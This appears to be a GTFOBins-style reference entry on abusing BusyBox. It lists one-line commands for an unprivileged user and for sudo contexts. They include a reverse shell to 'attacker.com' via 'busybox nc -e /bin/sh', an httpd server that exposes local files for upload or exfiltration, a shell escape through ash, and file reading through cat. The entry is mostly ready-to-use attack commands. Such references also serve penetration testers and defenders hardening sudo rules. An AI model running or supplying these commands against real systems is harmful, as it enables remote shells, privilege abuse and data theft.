This executable can send back a reverse system shell to a listening attacker.
This function can be performed by any unprivileged user.
busybox nc -e /bin/sh attacker.com 12345
This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
busybox nc -e /bin/sh attacker.com 12345
This executable can upload local data.
This function can be performed by any unprivileged user.
busybox httpd -f -p 12345 -h .
This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
busybox httpd -f -p 12345 -h .
This executable can inherit functions from another.
This function can be performed by any unprivileged user.
busybox ash
This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
busybox ash
This function can be performed by any unprivileged user.
busybox cat
This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
busybox cat